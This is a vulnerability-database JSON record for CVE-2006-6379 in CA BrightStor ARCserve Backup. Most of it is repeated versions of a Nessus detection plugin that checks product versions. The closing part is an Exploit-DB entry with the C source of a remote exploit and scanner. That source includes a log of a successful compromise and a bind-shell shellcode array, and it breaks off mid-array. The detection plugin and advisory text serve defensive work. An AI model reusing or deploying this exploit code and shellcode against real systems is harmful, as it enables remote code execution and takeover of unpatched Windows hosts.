script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2011 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:35:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-01-16T20:07:03", "references": [{"idList": ["SAINT:8940368C56AF9FD6C894F29E6AE5EFBF", "SAINT:53FCF127771E89CD8C76DA47C3BF6B4B", "SAINT:AFD0DC6204D54294BA0B227874738615"], "type": "saint"}, {"idList": ["OSVDB:30775"], "type": "osvdb"}, {"idList": ["EDB-ID:1132"], "type": "exploitdb"}, {"idList": ["CVE-2006-6379"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:15338"], "type": "securityvulns"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "75c0846fb3bb817040772c6190b25fbcabf4e6d54eadb9db543a18477c9ad1f8", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "3df95bb580deecca3f439f8e778654f1", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "edd4a2e72a7e4c07d2c8b0ad00509f59", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "adcf03de3f96ecb3a41330491bfe3999", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2019-01-16T20:07:03", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded", "http://www.nessus.org/u?34d9360c"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 7, "lastseen": "2019-01-16T20:07:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 1, "enchantments": {}, "hash": "cf38075e449d8db0fb98b349d7a03021ac275e893e81f779a9932b8cbb869b3b", "hashmap": [{"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "253070b2147836c5b000d6f0e62c8663", "key": "modified"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "7f3490b6cc1073c858e0dedd24527124", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2016-09-26T17:23:48", "modified": "2011-10-21T00:00:00", "naslFamily": "Windows", "objectVersion": "1.2", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2011/10/21 01:22:51 $\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n script_osvdb_id(30775);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2011 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:48"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "10b5ca3aa252884cd2c8c50302b4cf87"}, {"key": "cvelist", "hash": "afa83ac780a3bef839cd2eac311c3b43"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "c55db14813ed5b06a609aab225b62959"}, {"key": "href", "hash": "ec68938fd283cbe4329e1a4083d56721"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "aea23489ce3aa9b6406ebb28e0cda430"}, {"key": "pluginID", "hash": "1c1b844e81f60edc6af816d8949a07b0"}, {"key": "published", "hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699"}, {"key": "references", "hash": "edd4a2e72a7e4c07d2c8b0ad00509f59"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "3df95bb580deecca3f439f8e778654f1"}, {"key": "title", "hash": "26328e0ecfef985ee1e44581d0630ce0"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "97803c325b0889b49fa0bfaf9be3d4e04dfb6444f526c6b724cd778779ddab1c", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6379"]}, {"type": "osvdb", "idList": ["OSVDB:30775"]}, {"type": "saint", "idList": ["SAINT:53FCF127771E89CD8C76DA47C3BF6B4B", "SAINT:8940368C56AF9FD6C894F29E6AE5EFBF", "SAINT:AFD0DC6204D54294BA0B227874738615"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15338"]}, {"type": "exploitdb", "idList": ["EDB-ID:1132"]}], "modified": "2019-02-21T01:09:38"}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-02-21T01:09:38"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "naslFamily": "Windows", "pluginID": "23841", "cpe": ["cpe:/a:ca:arcserve_backup"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:08:35", "bulletinFamily": "NVD", "description": "Buffer overflow in the BrightStor Backup Discovery Service in multiple CA products, including ARCserve Backup r11.5 SP1 and earlier, ARCserve Backup 9.01 up to 11.1, Enterprise Backup 10.5, and CA Server Protection Suite r2, allows remote attackers to execute arbitrary code via unspecified vectors.", "modified": "2018-10-17T21:47:00", "id": "CVE-2006-6379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6379", "published": "2006-12-10T19:28:00", "title": "CVE-2006-6379", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T13:36:34", "bulletinFamily": "exploit", "description": "CA BrightStor ARCserve Backup Auto Scanner / Exploiter. CVE-2006-6379. Remote exploit for windows platform", "modified": "2005-08-03T00:00:00", "published": "2005-08-03T00:00:00", "id": "EDB-ID:1132", "href": "https://www.exploit-db.com/exploits/1132/", "type": "exploitdb", "title": "CA BrightStor ARCserve Backup Auto Scanner / Exploiter", "sourceData": "/*\r\n * 02/20/2005\r\n *\r\n * This is provided as proof-of-concept code only for educational\r\n * purposes and testing by authorized individuals with permission\r\n * to do so.\r\n *\r\n * exploit by : cybertronic\r\n *\r\n * cybertronic[at]gmx[dot]net\r\n *\r\n * This exploits the following vulnerabilities:\r\n *\r\n * Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe\r\n * Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe\r\n *\r\n * I included a vulnerability scanner, that scans for the bugs mentioned above\r\n * and logs to \"scan.log\" in working directory.\r\n * You have to adjust the timeout, it works fine on my network with\r\n * usec = 10000: ~10 hosts / sec\r\n *\r\n * some greetz fly to:\r\n * HD Moore - I`ll pay you some drinks, you know what they are for ;)\r\n * houseofdabus\r\n *\r\n * compile: gcc -o greetz_to_ca greetz_to_ca.c\r\n *\r\n * below is a screenshot of scan-mode:\r\n * __ __ _\r\n * _______ __/ /_ ___ _____/ /__________ ____ (_)____\r\n * / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/\r\n * / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__\r\n * \\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/\r\n * /____/\r\n *\r\n * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\r\n *\r\n * --[ choose\r\n * |\r\n * |--[0] = start scanner\r\n * `--[1] = send some greetings to ca\r\n *\r\n * $ 0\r\n *\r\n * --[ enter IP-range\r\n * |\r\n * |--[start-ip] $ 192.168.2.90\r\n * `--[end-ip ] $ 192.168.2.120\r\n *\r\n * --[ select port to scan for\r\n * |\r\n * |--[ 6070] = dbasqlr\r\n * `--[41523] = dsconfig\r\n *\r\n * $ 6070\r\n *\r\n * --[ I can try to exploit the bug, shall I ?\r\n * |\r\n * |--[0] yes, try it!\r\n * `--[1] no, i`am on my own!\r\n *\r\n * $ 0\r\n *\r\n * --[ select shellcode\r\n * |\r\n * |--[0] = bindshell\r\n * `--[1] = reverseshell\r\n *\r\n * $ 0\r\n *\r\n * oO---[ scanner - scan.log ]---Oo\r\n *\r\n * [192.168.2.90:6070] closed\r\n * [192.168.2.91:6070] closed\r\n * [192.168.2.92:6070] closed\r\n * [192.168.2.93:6070] closed\r\n * [192.168.2.94:6070] closed\r\n * [192.168.2.95:6070] closed\r\n * [192.168.2.96:6070] closed\r\n * [192.168.2.97:6070] closed\r\n * [192.168.2.98:6070] closed\r\n * [192.168.2.99:6070] closed\r\n * [192.168.2.100:6070] closed\r\n * [192.168.2.101:6070] open\r\n *\r\n\r\n// the first one is a fake service that was running by accident ( netcat -l -p 6070 )\r\n\r\n\r\n * oO---[ exploitation ]---Oo\r\n *\r\n * --[ connecting to 192.168.2.101:6070...done!\r\n * --[ exploiting dbasqlr.exe...\r\n * --[ sending packet [ 3288 bytes ]...done!\r\n * --[ sleeping 5 seconds...\r\n * --[ connecting to 192.168.2.101:4444...failed!\r\n *\r\n * [192.168.2.102:6070] open\r\n *\r\n * oO---[ exploitation ]---Oo\r\n *\r\n * --[ connecting to 192.168.2.102:6070...done!\r\n * --[ exploiting dbasqlr.exe...\r\n * --[ sending packet [ 3288 bytes ]...done!\r\n * --[ sleeping 5 seconds...\r\n * --[ connecting to 192.168.2.102:4444...done!\r\n * --[ b0x pwned - h4ve phun\r\n * Microsoft Windows XP [Version 5.1.2600]\r\n * (C) Copyright 1985-2001 Microsoft Corp.\r\n *\r\n * C:\\WINDOWS\\system32>exit\r\n * exit\r\n * bye bye...\r\n * [192.168.2.103:6070] closed\r\n * [192.168.2.104:6070] closed\r\n * [192.168.2.105:6070] closed\r\n * [192.168.2.106:6070] closed\r\n * [192.168.2.107:6070] closed\r\n * [192.168.2.108:6070] closed\r\n * [192.168.2.109:6070] closed\r\n * [192.168.2.110:6070] closed\r\n * [192.168.2.111:6070] closed\r\n * [192.168.2.112:6070] closed\r\n * [192.168.2.113:6070] closed\r\n * [192.168.2.114:6070] closed\r\n * [192.168.2.115:6070] closed\r\n * [192.168.2.116:6070] closed\r\n * [192.168.2.117:6070] closed\r\n * [192.168.2.118:6070] closed\r\n * [192.168.2.119:6070] closed\r\n * [192.168.2.120:6070] closed\r\n *\r\n * oO---[ scan completed ]---Oo\r\n *\r\n * [ cybertronic @ CA ] #\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n\r\n/*\r\n *\r\n * definitions\r\n *\r\n */\r\n\r\n#define PORT_DBASQLR\t6070\r\n#define PORT_DSCONFIG\t41523\r\n\r\n#define RED\t\t\"\\E[31m\\E[1m\"\r\n#define GREEN\t\"\\E[32m\\E[1m\"\r\n#define YELLOW\t\"\\E[33m\\E[1m\"\r\n#define BLUE\t\"\\E[34m\\E[1m\"\r\n#define NORMAL\t\"\\E[m\"\r\n\r\n/*\r\n *\r\n * prototypes\r\n *\r\n */\r\n\r\nint connect_to_remote_host ( char* tip, unsigned short tport );\r\nint exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );\r\nint exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );\r\nint isip ( char *ip );\r\nint is_open ( char* ip, unsigned short tport );\r\nint select_action ();\r\nint select_shellcode ();\r\nint select_vulnerability ();\r\nint shell ( int s, char* tip, unsigned short cbport );\r\n\r\nvoid connect_to_bindshell ( char* tip, unsigned short bport );\r\nvoid fall_asleep ( int sec );\r\nvoid header ();\r\nvoid start_reverse_handler ( int cbport );\r\nvoid usage ( char* name );\r\n\r\n/*********************\r\n * Windows Shellcode *\r\n *********************/\r\n\r\n/*\r\n * Type : bind shellcode\r\n * Length: 500 bytes\r\n * Port : 4444 / 0x115c\r\n *\r\n */\r\n\r\nunsigned char bindshell[] =\r\n\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\"\r\n\"\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\r\n\"\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\"\r\n\"\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\"\r\n\"\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\"\r\n\"\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\"\r\n\"\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\"\r\n\"\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\"\r\n\"\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\"\r\n\"\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\"\r\n\"\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\"\r\n\"\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\"\r\n\"\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\"\r\n\"\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\"\r\n\"\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\"\r\n\"\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\"\r\n\"\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\"\r\n\"\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\"\r\n\"\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\"\r\n\"\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\"\r\n\"\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\"\r\n\"\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\\x34\\x72\\xa0\\x0b\\x17\\x8a